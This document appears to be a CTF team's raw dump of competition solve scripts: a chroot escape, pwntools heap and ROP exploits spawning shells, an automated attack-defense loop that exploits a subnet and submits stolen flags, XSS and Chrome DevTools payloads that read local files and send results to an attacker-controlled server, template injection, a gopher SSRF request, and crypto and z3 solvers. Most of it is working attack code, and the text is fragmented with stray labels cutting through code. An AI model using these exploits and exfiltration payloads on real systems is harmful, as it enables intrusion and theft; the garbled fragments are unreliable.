// 0x5aad1e4aa01328f4eb1102b5f5efa77d6b6d78f6b384fa60c4765a9c18362161
babyjail
babybaes
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <stdlib.h>
#include <ctype.h>
#include <unistd.h>
int main() {
char *shell[2] = {"/bin/sh", NULL};
seteuid(0);
printf("%d\n", chroot("./fuck"));
printf("%d\n", chroot("../../../../../../"));
execve("/bin/sh", shell, NULL);
return 0;
}
# -*- coding: utf-8 -*-
from pwn import *
r = lambda x: p.recvuntil(x,drop=True)
s = lambda x,y: p.sendafter(x,y)
sl = lambda x,y: p.sendlineafter(x,y)
context.log_level = 'debug'
p = process('./bayes', env={"LD_PRELOAD":"./libc-2.31.so"})
def create(choice, value=None):
sl('> ', str(1))
sl('[y/n]? ', choice)
if choice=='y':
sl('= ', str(value))
def train(idx, features, labels):
sl('> ', str(2))
sl('? ', str(idx))
sl('finish)\n', features+'\nEND')
sl('labels: \n', labels)
def show(idx):
sl('> ', str(3))
sl('? ', str(idx))
def predict(idx, document):
sl('> ', str(4))
sl('? ', str(idx))
sl(': \n', document)
def remove(idx):
sl('> ', str(5))
sl('? ', str(idx))
create('n') #0
create('n') #1
train(1, ' ', '0')
for i in range(0x50+0x70):
train(1, ' ', '-1')
# show(0)
create('n') #1
create('n') #2
create('n') #3
create('n') #4
create('n') #5
create('n') #6
create('n') #6
create('n') #6
create('n') #6
create('n') #6
create('n') #6
create('n') #6
hardstack
remove(0)
remove(1)
train(8, ' ', '0')
train(8, ' ', '0')
train(8, ' ', '0')
remove(8)
create('n')
create('n')
predict(10, '\x00'*0xc8+p64(0x461))
remove(3)
create('n')
create('n')
show(4)
r('training data: ')
libc = int(r('\n'),10)-0x1ebbe0
log.info("@ libc: "+hex(libc))
__free_hook = libc+0x1eeb28
log.info("@ __free_hook: "+hex(__free_hook))
system = libc+0x55410
log.info("@ system: "+hex(system))
one = libc+0xe6c81
log.info("@ one: "+hex(one))
remove(6)
remove(5)
predict(10, ('\x00'*0x68+p64(0x71)+p64(__free_hook).ljust(0x180,'\x00')))
create('n')
predict(10, p64(one)+'\x00'*0x50)
p.interactive()
from pwn import *
import requests
# TqBkeptm
local = 1
debug = 1
Timeout.default = 2
libc = ELF('./libc-2.27.so')
if debug == 1:
context.log_level = 'debug'
def pwn(p):
def launch_gdb():
if local != 1:
return
context.terminal = ['xfce4-terminal', '-x', 'sh', '-c']
#print(proc.pidof(p)[0])
raw_input()
# gdb.attach(p)
# gdb.attach(proc.pidof(p)[0])
def add(i,size):
p.recvuntil('choice:')
p.sendline('1')
p.recvuntil(':')
p.sendline(str(i))
p.recvuntil(':')
p.sendline(str(size))
def edit(i,d):
p.recvuntil('choice:')
p.sendline('2')
p.recvuntil(':')
p.sendline(str(i))
p.recvuntil(':')
p.sendline(d)
def show(i):
p.recvuntil('choice:')
p.sendline('3')
p.recvuntil(':')
p.sendline(str(i))
def dele(i):
p.recvuntil('choice:')
p.sendline('4')
p.recvuntil(':')
p.sendline(str(i))
def stack_over(s):
payload = 'a' * 0x100 + p64(0x602150) + p64(0x4010a3)+p64(0)*11 +s
p.recvuntil('choice:')
p.sendline('666')
sleep(0.1)
p.sendline(str(len(payload)))
sleep(0.1)
p.send(payload)
def csu_call(addr,p1,p2,p3):
payload = p64(0x40113A)
payload += p64(0) + p64(1) + p64(addr) + p64(p1) + p64(p2) + p64(p3) +
p64(0x00401120)
payload += p64(0) + p64(0xDEADE000 + 0xf00) * 6 + p64(0x400F90)
return payload
'''
00401120 mov rdx, r15
.text:0000000000401123 mov rsi, r14
.text:0000000000401126 mov edi, r13d
.text:0000000000401129 call ds:(funcs_401129 - 601D78h)[r12+rbx*8]
.text:000000000040112D add rbx, 1
.text:0000000000401131 cmp rbp, rbx
.text:0000000000401134 jnz short loc_401120
40113A pop rbx
.text:000000000040113B pop rbp
.text:000000000040113C pop r12
.text:000000000040113E pop r13
.text:0000000000401140 pop r14
.text:0000000000401142 pop r15
.text:0000000000401144 retn
'''
add(0,0x400)
add(1,0x400)
dele(0)
dele(1)
edit(1,p64(0xDEADE000))
add(2,0x400)
add(3,0x400) # 400C24
launch_gdb()
edit(3,p64(0x0000000000000018) + p64(0x40113A)+
p64(0x0000000000401079)+p64(0x0000000000400ed3)+'\n')
stack_over(csu_call(0x601FA0 ,1,0x601FA0,0x10))
p.recvuntil('\x00\x00')
leak_lib = u64(p.recv(8))
log.info(hex(leak_lib))
base = leak_lib - 1631440
edit(3,p64(0x0000000000000018) + p64(0x0000000000401143)+
p64(0x0000000000401079)+p64(0x0000000000400ed3)+'\n')
stack_over(p64(0x0000000000401143) + p64(base + next(libc.search('/bin/sh'))) +
p64(0x0000000000401144) + p64(base + libc.symbols['system']))
ip_list = '172.0.x.12'
port = 0
import sys
import json
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
try:
import httplib
except ImportError:
import http.client as httplib
server_host = '10.10.10.1' # modify this
server_port = 80 # modify this
def my_submit_flag(flag, team_token = '6DnR5NSdrE36bvGtKWaKX95tq8v23UdbRFCMmwuHeVQEQ',
host=server_host, port=server_port, timeout=5):
if not team_token or not flag:
raise Exception('team token or flag not found')
conn = httplib.HTTPConnection(host, port, timeout=timeout)
params = urlencode({
'token': team_token,
'flag': flag,
})
headers = {
"Content-type": "application/x-www-form-urlencoded"
}
conn.request('POST', '/api/v1/att_def/web/submit_flag/?event_id=10', params,
headers)
response = conn.getresponse()
data = response.read()
conn.close()
print(json.loads(data))
return
if __name__ == '__main__':
if local == 1:
# p = process('./hardstack.bak',env = {'LD_PRELOAD':'./libc-2.27.so'})
p = remote('172.35.13.44',9999)
pwn(p)
p.interactive()
else:
while True:
for i in xrange(20):
try:
ip = '172.0.'+str(i+50) + '.12'
p = remote(ip,8888)
context.log_level = 'info'
pwn(p)
context.log_level = 'debug'
p.sendline('echo kkp && cat flag')
# p.interactive()
p.recvuntil('kkp\n',timeout=1)
flag = p.recvline().strip()
print(flag)
my_submit_flag(flag)
p.close()
except Exception:
continue
house of pig
from pwn import *
a1="A@H@x"
a2="Bhg#l"
a3="C3-hB"
context.log_level="debug"
def cmd(s):
p.sendlineafter(": ",str(s))
def cmd1(s):
p.sendafter(": ",str(s))
def add(size,note):
cmd(1)
cmd(size)
cmd1(note)
def delete(index):
cmd(4)
cmd(index)
def show(index):
cmd(2)
cmd(index)
def edit(index,note):
cmd(3)
cmd(index)
cmd1(note)
def change(note):
cmd(5)
p.sendlineafter(":\n",note)
#p=process("./pig")
p=remote("172.35.13.26",8888)
change(a1)
for i in range(8):
add(0xf0,"\n"*5)
for i in range(8):
delete(7-i)
change(a2)
add(0xf0,"\n"*5)
delete(0)
change(a3)
add(0xf0,"\n"*5)
change(a2)
add(0x440,"\n"*(0x430/0x30))
change(a1)
add(0x208,"\n"*(0x208/0x30))
change(a3)
add(0x430,"\n"*(0x430/0x30))
add(0x430,"\n"*(0x430/0x30))
add(0x430,"\n"*(0x430/0x30))
change(a1)
add(0x208,"\n"*(0x208/0x30))
change(a2)
delete(1)
add(0x450,"\n"*(0x450/0x30))
change(a3)
delete(3)
change(a1)
show(3)
p.recvuntil("The message is: ")
heap= u64(p.recv(6)+"\x00\x00")
print hex(heap)#0x5555555707e0
change(a2)
show(1)
p.recvuntil("The message is: ")
libc= u64(p.recv(6)+"\x00\x00")-0x7ffff7db2fe0+0x7ffff7bc7000
print hex(libc)
#gdb.attach(p)
edit(1,p64(libc-0x7ffff7bc7000+0x7ffff7db3628-0x20)*2+"\n"*(0x440/0x30-1))
change(a1)
add(0x410,"\n"*(0x410/0x30))
#gdb.attach(p)
change(a2)
edit(1,p64(heap-0x5555555702b0+0x00005555555706a0)*2+"\n"*(0x440/0x30-1))
change(a3)
delete(1)
add(0x430,("/bin/sh\x00"+p64(libc-0x7ffff7bc7000+0x7ffff7c1c410))*(0x430/0x30))
base=0
ptr=0x100
end=0
buf_base=heap-0x5555555702b0+0x555555570d10
buf_end=heap-0x5555555702b0+0x555555570d10+70
next=heap-0x5555555702b0+0x55555556feb0
fake_jmp=libc-0x7ffff7bc7000+0x7ffff7db4560
payload=p64(0)
payload+=p64(0)+p64(base)+p64(ptr)+p64(end)
hello arm
payload+=p64(buf_base)+p64(buf_end)+p64(0)*4+p64(next)+p64(1)+p64(0)*12+p64(fake_jmp)
p.sendlineafter(":\n",payload)
change(a1)
edit(1,p64(libc-0x7ffff7bc7000+0x7ffff7db5b28-8)+"\n"*5)
base=0
ptr=0x100
end=0
buf_base=heap-0x5555555702b0+0x555555570df0
buf_end=heap-0x5555555702b0+0x555555570df0+70
next=heap-0x5555555702b0+0x55555556feb0
fake_jmp=libc-0x7ffff7bc7000+0x7ffff7db4560
payload=p64(0)*3
payload+=p64(0)+p64(base)+p64(ptr)+p64(end)
payload+=p64(buf_base)+p64(buf_end)+p64(0)*4+p64(next)+p64(1)+p64(0)*12+p64(fake_jmp)
edit(0,payload[:0x10]+payload[0x30:0x40]+payload[0x60:0x70]+payload[0x90:0xa0]+payload[
0xc0:0xd0])
p.sendline("")
change(a2)
edit(0,payload[0x10:0x20]+payload[0x40:0x50]+payload[0x70:0x80]+payload[0xa0:0xb0]+payl
oad[0xd0:0xe0]+"\n")
change(a3)
edit(0,payload[0x20:0x30]+payload[0x50:0x60]+payload[0x80:0x90]+payload[0xb0:0xc0]+"\n"
*2)
#gdb.attach(p)
p.interactive()
from pwn import *
# s = process("qemu-arm -g 1234 -L . ./pwnarm",shell=True)
# s = process("qemu-arm -L . ./pwnarm",shell=True)
s = remote("172.35.13.17","10001")
def cmd(i):
s.sendlineafter("choice:",str(i))
sleep(0.2)
def show(idx):
cmd(2)
s.sendlineafter("index?",str(idx))
sleep(0.2)
def free(idx):
cmd(3)
s.sendlineafter("index?",str(idx))
sleep(0.2)
def edit(idx,size,buf):
cmd(4)
s.sendlineafter("index?",str(idx))
sleep(0.2)
s.sendlineafter("size:",str(size))
sleep(0.2)
s.sendafter("inputs:",buf)
sleep(0.2)
raw_input(">")
cmd(1)
# raw_input(">")
s.sendline("b53efe319540434961065ca81c5887a80ea2")
sizes = []
def dq(s):
a = s % 8
b = s/8
s = b*8
if(a > 4):
s += 8
s += 8
if(s < 0x10):
s = 0x10
return s
for i in range(8):
show(i)
s.recvuntil("size: ")
ss = int(s.recvline(keepends=False))
print hex(ss),
ss = dq(ss)-8
print hex(ss)
sizes.append(ss)
us = 0
for i in range(8):
if(sizes[i] > 0x40 and i > 0 and sizes[i+1] > 0x40):
us = i
break
dngs2010
svg xss
Chrome DevTools for eventloop
print(hex(us),hex(sizes[us]),hex(sizes[us+1]))
bss = 0x10000+us*12+4
fake = p32(0)+p32(sizes[us])+p32(bss-12)+p32(bss-8)
fake = fake.ljust(sizes[us],'\x00')
fake += p32(sizes[us])+p32(sizes[us+1]+8)
edit(us,sizes[us]+8+8+8,fake)
free(us+1)
atoi_got = 0x11634
free_got = 0x1163C
puts_plt = 0x85F8
payload = p32(0x10000)+p32(0x100) #us-1
payload += p32(1)+p32(atoi_got)+p32(0x100) #us
payload += p32(1)+p32(free_got)+p32(0x100) #us+1
payload += p32(1)+p32(atoi_got)+p32(0x100) #us+2
edit(us,100,payload)
edit(us+1,4,p32(puts_plt))
free(us+2)
context.arch = 'arm'
libc = ELF("./lib/libc.so.0")
atoi = u32(s.recv(4))
success(hex(atoi))
libc.address = atoi-libc.sym['atoi']
success(hex(libc.address))
system = libc.sym['system']
edit(us,4,p32(system))
cmd("sh;\x00")
s.interactive()
GET /img/88888888"><%2fimage>
<script>window.location='http:%2f%2f172.35.13.164:8000%2ffuck2.html';<%2fscript>
<image%20fuck=".png
<body>
<script>
const scan = (ip, port) => {
let s = document.createElement("script");
s.src = "http://" + ip + ":" + port;
s.onload = () => {
if(port != 3000){
ID
ws payload for open
fetch("<http://172.35.13.164:8000/?p=>" + port)
for(let i = 0; i < 300000; i++) {
console.log("fuck!!!!");
}
}
};
document.getElementsByTagName('body')[0].appendChild(s);
};
let p = Array.from({length: 10000}, (a, i) => i + 40000);
port = p;
let i = 0;
while(i != p.length){
scan("127.0.0.1", port[i]);
i = i + 1;
}
window.onload = () => {
fetch("<http://172.35.13.164:8000/?windowonload>");
};
</script>
</body>
<html>
<body>
<script>
let port = 41057;
let id = "AA135DEF688970FE0CC30D7E1B36EEB5";
let ws = new WebSocket(`ws://127.0.0.1:${port}/devtools/page/${id}`);
fetch('<http://172.35.13.164:8000/?onwsbegin>');
ws.addEventListener('error', (e) => {
fetch('<http://172.35.13.164:8000/?onwserror=>' + encodeURIComponent(e));
});
ws.addEventListener('close', (e) => {
fetch('<http://172.35.13.164:8000/?onwsclosed=>' +
encodeURIComponent(e.reason));
warmupcms
});
ws.addEventListener('open', (e) => {
fetch('<http://172.35.13.164:8000/?onwsopen>');
ws.send(JSON.stringify({id: 0, method: 'Page.navigate', params: {url:
'file:///flag'}}));
ws.send(JSON.stringify({id: 1, method: 'Runtime.evaluate', params: {expression:
'document.documentElement.outerHTML'}}));
});
ws.addEventListener('message', (e) => {
fetch('<http://172.35.13.164:8000/?onwsdata=>' +
btoa(encodeURIComponent(JSON.stringify(e.data))));
});
fetch('<http://172.35.13.164:8000/?onwsend1>');
for(let i = 0; i < 5000; i++) {
console.log("fuck!");
}
fetch('<http://172.35.13.164:8000/?onwsend2>');
</script>
</body>
</html>
GSA
<!--{if $name==system('/readflag')}-->
<!--{/if}-->
from Crypto.Util.number import *
from string import ascii_letters, digits
table = ascii_letters+digits
from pwn import *
def rational_to_contfrac(x, y):
a = x//y
pquotients = [a]
while a * y != x:
x, y = y, x-a*y
a = x//y
pquotients.append(a)
return pquotients
def convergents_from_contfrac(frac):
convs = []
for i in range(len(frac)):
convs.append(contfrac_to_rational(frac[0:i]))
return convs
def contfrac_to_rational(frac):
if len(frac) == 0:
return (0, 1)
num = frac[-1]
denom = 1
for _ in range(-2, -len(frac)-1, -1):
num, denom = frac[_]*num+denom, num
return (num, denom)
def bitlength(x):
assert x >= 0
n = 0
while x > 0:
n = n+1
x = x >> 1
return n
def isqrt(n):
if n < 0:
raise ValueError('square root not defined for negative numbers')
if n == 0:
return 0
a, b = divmod(bitlength(n), 2)
x = 2**(a+b)
while True:
y = (x + n//x)//2
if y >= x:
return x
x = y
def is_perfect_square(n):
h = n & 0xF
if h > 9:
return -1
if (h != 2 and h != 3 and h != 5 and h != 6 and h != 7 and h != 8):
t = isqrt(n)
if t*t == n:
return t
else:
return -1
return -1
def sqrt(n):
l = 0
r = n
while(r-l>1):
m = (r+l)//2
if(m*m>n):
r = m
else:
l = m
return l
def hack_RSA(e, p):
frac = rational_to_contfrac(e, p)
convergents = convergents_from_contfrac(frac)
for (k, d) in convergents:
if(d.bit_length() in range(510,515)):
phi = e*d//k
delta = n*n-phi+1
s = delta+2*n
m = sqrt(s)
if(m%2==1):
m = m+1
if(m*m==s):
print(m)
di = sqrt(delta-2*n)
if(di%2==1):
di = di+1
return (m-di)//2
s = remote("172.35.13.13","10002")
s.recvuntil("sha256(XXX+")
d = s.recvuntil(")",drop=True)
s.recvuntil("== ")
x = s.recvline(keepends=False)
ans = ''
for i in range(1):
for j in range(62):
for k in range(62):
for l in range(62):
data=table[j]+table[k]+table[l]+d
data_sha = hashlib.sha256(data.encode('ascii')).hexdigest()
if (data_sha==x):
ans = table[j]+table[k]+table[l]
print ans
apk
break
s.sendlineafter("Give me XXX:",ans)
s.recvuntil("n = ")
n = int(s.recvuntil("e",drop=True).replace("\n",""))
s.recvuntil("= ")
e = int(s.recvuntil("choice",drop=True).replace("\n",""))
p = n*n-5*n
#print(p)
d = hack_RSA(e, p)
print(d,n%d)
from hashlib import sha1
print(sha1(long_to_bytes(d)).hexdigest())
s.interactive()
package com.company;
import com.sun.org.apache.xml.internal.security.exceptions.Base64DecodingException;
import com.sun.org.apache.xml.internal.security.utils.Base64;
import javax.crypto.Cipher;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.lang.reflect.Array;
import java.lang.reflect.InvocationTargetException;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.security.Key;
import java.security.MessageDigest;
import java.util.Arrays;
public class Main {
private static int transform(byte temp) {
int tempInt = temp;
if(tempInt < 0) {
tempInt += 0x100;
}
return tempInt;
}
private static byte[] intToByte(int[] content, int offset) {
byte[] result = new byte[content.length << 2];
int i = 0;
int j;
for(j = offset; j < result.length; j += 4) {
result[j + 3] = (byte)(content[i] & 0xFF);
result[j + 2] = (byte)(content[i] >> 8 & 0xFF);
result[j + 1] = (byte)(content[i] >> 16 & 0xFF);
result[j] = (byte)(content[i] >> 24 & 0xFF);
++i;
}
return result;
}
private static int[] byteToInt(byte[] content, int offset) {
int[] result = new int[content.length >> 2];
int i = 0;
int j;
for(j = offset; j < content.length; j += 4) {
result[i] = transform(content[j + 3]) | transform(content[j + 2]) << 8 |
transform(content[j + 1]) << 16 | content[j] << 24;
++i;
}
return result;
}
public static byte[] ooxx(byte[] content, int offset, int[] ooxxooxxoo) {
int[] tempInt = byteToInt(content, offset);
int y = tempInt[0];
int z = tempInt[1];
int sum = 0;
int a = ooxxooxxoo[0];
int b = ooxxooxxoo[1];
int c = ooxxooxxoo[2];
int d = ooxxooxxoo[3];
int i;
for(i = 0; i < 0x20; ++i) {
sum += 305419896;
y += (z << 4) + a ^ z + sum ^ (z >> 5) + b;
z += (y << 4) + c ^ y + sum ^ (y >> 5) + d;
// System.out.println(y);
// System.out.println(z);
}
tempInt[0] = y;
tempInt[1] = z;
// System.out.println("-----------");
// System.out.println(y);
// System.out.println(z);
return intToByte(tempInt, 0);
}
public static byte[] dec11(byte[] content, int offset, int[] ooxxooxxoo) {
int[] tempInt = byteToInt(content, offset);
int y = tempInt[0];
int z = tempInt[1];
// System.out.println("-----------");
// System.out.println(y);
// System.out.println(z);
int sum = 0;
for(int jj = 0;jj<0x20;jj++)
{
sum += 305419896;
}
int a = ooxxooxxoo[0];
int b = ooxxooxxoo[1];
int c = ooxxooxxoo[2];
int d = ooxxooxxoo[3];
int i;
for(i = 0; i < 0x20; ++i) {
// sum += 305419896;
//// y += (z << 4) + a ^ z + sum ^ (z >> 5) + b;
//// z += (y << 4) + c ^ y + sum ^ (y >> 5) + d;
// System.out.println(y);
// System.out.println(z);
z -= (y << 4) + c ^ y + sum ^ (y >> 5) + d;
y -= (z << 4) + a ^ z + sum ^ (z >> 5) + b;
sum -= 305419896;
}
tempInt[0] = y;
tempInt[1] = z;
return intToByte(tempInt, 0);
}
public static byte[] de11(byte[] info) {
String ooxxooxxoo = "youaresoclever!!";
int j;
for(j = 0; j < 16; ++j) {
ooxxooxxoo = ooxxooxxoo + "!";
}
byte[] ooxxooxxooarray = ooxxooxxoo.getBytes();
int[] ooxxooxxooxx = new int[16];
int i;
for(i = 0; i < 16; ++i) {
ooxxooxxooxx[i] = ooxxooxxooarray[i];
}
if(info.length % 8 != 0) {
return null;
}
byte[] result = new byte[info.length];
int offset;
for(offset = 0; offset < result.length; offset += 8) {
System.arraycopy(dec11(info, offset, ooxxooxxooxx), 0, result, offset, 8);
}
return result;
}
public static byte[] dec22(byte[] content, int offset, int[] ooxxooxxoo) {
int[] tempInt = byteToInt(content, offset);
int y = tempInt[0];
int z = tempInt[1];
// System.out.println("-----------");
// System.out.println(y);
// System.out.println(z);
int sum = 0;
for(int jj = 0;jj<0x20;jj++)
{
sum += 0x515374A1;
}
int a = ooxxooxxoo[0];
int b = ooxxooxxoo[1];
int c = ooxxooxxoo[2];
int d = ooxxooxxoo[3];
int i;
for(i = 0; i < 0x20; ++i) {
// sum += 305419896;
//// y += (z << 4) + a ^ z + sum ^ (z >> 5) + b;
//// z += (y << 4) + c ^ y + sum ^ (y >> 5) + d;
// System.out.println(y);
// System.out.println(z);
z -= (y << 4) + c ^ y + sum ^ (y >> 5) + d;
y -= (z << 4) + a ^ z + sum ^ (z >> 5) + b;
sum -= 0x515374A1;
}
tempInt[0] = y;
tempInt[1] = z;
return intToByte(tempInt, 0);
}
public static byte[] de22(byte[] info) {
String ooxxooxxoo = "zipMatcher";
int j;
for(j = 0; j < 16; ++j) {
ooxxooxxoo = ooxxooxxoo + "!";
}
byte[] ooxxooxxooarray = ooxxooxxoo.getBytes();
int[] ooxxooxxooxx = new int[16];
int i;
for(i = 0; i < 16; ++i) {
ooxxooxxooxx[i] = ooxxooxxooarray[i];
}
if(info.length % 8 != 0) {
return null;
}
byte[] result = new byte[info.length];
int offset;
for(offset = 0; offset < result.length; offset += 8) {
System.arraycopy(dec22(info, offset, ooxxooxxooxx), 0, result, offset, 8);
}
return result;
}
public static byte[] encrypt1(byte[] info) {
String ooxxooxxoo = "youaresoclever!!";
int j;
for(j = 0; j < 16; ++j) {
ooxxooxxoo = ooxxooxxoo + "!";
}
byte[] ooxxooxxooarray = ooxxooxxoo.getBytes();
int[] ooxxooxxooxx = new int[16];
int i;
for(i = 0; i < 16; ++i) {
ooxxooxxooxx[i] = ooxxooxxooarray[i];
}
if(info.length % 8 != 0) {
return null;
}
byte[] result = new byte[info.length];
int offset;
for(offset = 0; offset < result.length; offset += 8) {
System.arraycopy(ooxx(info, offset, ooxxooxxooxx), 0, result, offset, 8);
}
return result;
Dubbo
}
private static final char[] HEX_ARRAY = "0123456789ABCDEF".toCharArray();
public static String bytesToHex(byte[] bytes) {
char[] hexChars = new char[bytes.length * 2];
for (int j = 0; j < bytes.length; j++) {
int v = bytes[j] & 0xFF;
hexChars[j * 2] = HEX_ARRAY[v >>> 4];
hexChars[j * 2 + 1] = HEX_ARRAY[v & 0x0F];
}
return new String(hexChars);
}
public static byte[] hexStringToByteArray(String s) {
int len = s.length();
byte[] data = new byte[len / 2];
for (int i = 0; i < len; i += 2) {
data[i / 2] = (byte) ((Character.digit(s.charAt(i), 16) << 4)
+ Character.digit(s.charAt(i+1), 16));
}
return data;
}
public static void main(String[] args) throws Exception {
byte[] a = Base64.decode("IgMDcaHeDcHTRr1SUS7urw==");
System.out.println(new String(de11(encrypt1("1234567890123456".getBytes()))));
byte[] c = de22(a);
System.out.println(bytesToHex(c));
//aes.decrypt('097DB71BC22864FA79E182190DA7B039'.decode('hex')).encode('hex')
byte[] d = hexStringToByteArray("acbdcb5bb9db3cd99fbe1f7a83301f82");
byte[] e = de11(d);
System.out.println(bytesToHex(e));
}
}
providerzookeeperconsumer
space
pythonz3dump
GET /?
url=gopher://10.0.20.11:2181/_%2500%2500%2500%252d%2500%2500%2500%2500%2500%2500%2500%2
500%2500%2500%2500%2500%2500%2500%2575%2530%2500%2500%2500%2500%2500%2500%2500%2500%250
0%2500%2500%2510%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%
2500%2500%2500%2500%2500%2500%250e%2500%2500%2500%2501%2500%2500%2500%250c%2500%2500%25
00%2501%252f%2500 HTTP/1.1
Host: 172.35.13.101:8090
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,
*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Connection: close
from z3 import *
a0 = Int('a0')
a1 = Int('a1')
a2 = Int('a2')
a3 = Int('a3')
a4 = Int('a4')
a5 = Int('a5')
a6 = Int('a6')
a7 = Int('a7')
a8 = Int('a8')
a9 = Int('a9')
a10 = Int('a10')
a11 = Int('a11')
a12 = Int('a12')
a13 = Int('a13')
a14 = Int('a14')
a15 = Int('a15')
a16 = Int('a16')
a17 = Int('a17')
a18 = Int('a18')
a19 = Int('a19')
lamaba
lambda3typeexpr nodetype 0xtype 1lambda x N(x)type2M N(M)
so = Solver()
so.add( (((((((0+(2*((a10+0))+0)+0))+(10*((a8+0))+0)+0))+(3*
((a11+0))+0)+0))+0)-1753==0)
so.add( (((((((0+(7*((a17+0))+0)+0))+(6*((a4+0))+0)+0))+(8*((a16+0))+0)+0))+0)-2117==0)
so.add( (((((((0+(4*((a5+0))+0)+0))+(3*((a15+0))+0)+0))+(6*((a6+0))+0)+0))+0)-1071==0)
so.add( (((((((0+(3*((a17+0))+0)+0))+(5*((a4+0))+0)+0))+(2*((a16+0))+0)+0))+0)-1116==0)
so.add( (((((((0+(10*((a14+0))+0)+0))+(4*((a0+0))+0)+0))+(10*
((a9+0))+0)+0))+0)-2190==0)
so.add( (((((((0+(9*((a14+0))+0)+0))+(4*((a0+0))+0)+0))+(4*((a9+0))+0)+0))+0)-1764==0)
so.add( (((((((0+(2*((a3+0))+0)+0))+(1*((a2+0))+0)+0))+(3*((a1+0))+0)+0))+0)-617==0)
so.add( (((((((0+(9*((a14+0))+0)+0))+(8*((a0+0))+0)+0))+(3*((a9+0))+0)+0))+0)-2193==0)
so.add( (((((((0+(1*((a17+0))+0)+0))+(5*((a4+0))+0)+0))+(2*((a16+0))+0)+0))+0)-866==0)
so.add( (((((((0+(8*((a5+0))+0)+0))+(2*((a15+0))+0)+0))+(8*((a6+0))+0)+0))+0)-1594==0)
so.add( (((((((0+(5*((a12+0))+0)+0))+(10*((a13+0))+0)+0))+(2*
((a7+0))+0)+0))+0)-1153==0)
so.add( (((((((0+(10*((a12+0))+0)+0))+(5*((a13+0))+0)+0))+(8*
((a7+0))+0)+0))+0)-1737==0)
so.add( (((((((0+(5*((a12+0))+0)+0))+(9*((a13+0))+0)+0))+(9*((a7+0))+0)+0))+0)-1445==0)
so.add( (((((((0+(4*((a10+0))+0)+0))+(7*((a8+0))+0)+0))+(7*((a11+0))+0)+0))+0)-2119==0)
so.add( (((((((0+(5*((a3+0))+0)+0))+(2*((a2+0))+0)+0))+(5*((a1+0))+0)+0))+0)-1237==0)
so.add( (((((((0+(9*((a5+0))+0)+0))+(8*((a15+0))+0)+0))+(4*((a6+0))+0)+0))+0)-1463==0)
so.add( (((((((0+(7*((a10+0))+0)+0))+(8*((a8+0))+0)+0))+(4*((a11+0))+0)+0))+0)-2217==0)
so.add( (((((((0+(6*((a3+0))+0)+0))+(10*((a2+0))+0)+0))+(1*((a1+0))+0)+0))+0)-1871==0)
print(so.check())
print(so.model())
((lambda s_91 lambda s_70 ((91)(70))(91))(((lambda s_184 lambda s_158 ((184)(158))
(184))(((lambda s_255 lambda s_207 ((255)(207))(255))(((lambda s_152 lambda s_184
((152)(184))(152))(((lambda s_189 lambda s_108 ((189)(108))(189))(((lambda s_133 lambda
s_107 ((133)(107))(133))(((lambda s_213 lambda s_222 ((213)(222))(213))(((lambda s_133
lambda s_44 ((133)(44))(133))(((lambda s_120 lambda s_237 ((120)(237))(120))(((lambda
s_206 lambda s_78 ((206)(78))(206))(((lambda s_118 lambda s_13 ((118)(13))(118))
(((lambda s_92 lambda s_183 ((92)(183))(92))(((lambda s_228 lambda s_101 ((228)(101))
(228))(((lambda s_241 lambda s_26 ((241)(26))(241))(((lambda s_107 lambda s_252 ((107)
(252))(107))(((lambda s_234 lambda s_47 ((234)(47))(234))(((lambda s_116 lambda s_150
((116)(150))(116))(((lambda s_144 lambda s_145 ((144)(145))(144))(((lambda s_124 lambda
s_109 ((124)(109))(124))(((lambda s_72 lambda s_85 ((72)(85))(72))(((lambda s_119
lambda s_8 ((119)(8))(119))(((lambda s_55 lambda s_69 ((55)(69))(55))(((lambda s_249
lambda s_195 ((249)(195))(249))(((lambda s_2 lambda s_33 ((2)(33))(2))(((lambda s_58
lambda s_245 ((58)(245))(58))(((lambda s_6 lambda s_62 ((6)(62))(6))(((lambda s_212
lambda s_41 ((212)(41))(212))(((lambda s_150 lambda s_119 ((150)(119))(150))(((lambda
s_25 lambda s_244 ((25)(244))(25))(((lambda s_234 lambda s_38 ((234)(38))(234))
(((lambda s_202 lambda s_127 ((202)(127))(202))(((lambda s_79 lambda s_62 ((79)(62))
(79))(((lambda s_191 lambda s_218 ((191)(218))(191))(((lambda s_218 lambda s_109 ((218)
(109))(218))(((lambda s_112 lambda s_150 ((112)(150))(112))(((lambda s_237 lambda s_13
((237)(13))(237))(((lambda s_62 lambda s_98 ((62)(98))(62))(((lambda s_65 lambda s_158
((65)(158))(65))(((lambda s_113 lambda s_56 ((113)(56))(113))(((lambda s_203 lambda
s_23 ((203)(23))(203))(((lambda s_24 lambda s_59 ((24)(59))(24))(((lambda s_4 lambda
s_251 ((4)(251))(4))(((lambda s_184 lambda s_26 ((184)(26))(184))(((lambda s_231 lambda
s_82 ((231)(82))(231))(((lambda s_206 lambda s_43 ((206)(43))(206))(((lambda s_149
lambda s_195 ((149)(195))(149))(((lambda s_149 lambda s_169 ((149)(169))(149))(((lambda
s_161 lambda s_23 ((161)(23))(161))(((lambda s_67 lambda s_210 ((67)(210))(67))
(((lambda s_212 lambda s_168 ((212)(168))(212))(((lambda s_176 lambda s_4 ((176)(4))
(176))(((lambda s_218 lambda s_37 ((218)(37))(218))(((lambda s_76 lambda s_240 ((76)
(240))(76))(((lambda s_253 lambda s_102 ((253)(102))(253))(((lambda s_40 lambda s_152
((40)(152))(40))(((lambda s_128 lambda s_0 ((128)(0))(128))(((lambda s_219 lambda s_116
((219)(116))(219))(((lambda s_41 lambda s_61 ((41)(61))(41))(((lambda s_187 lambda
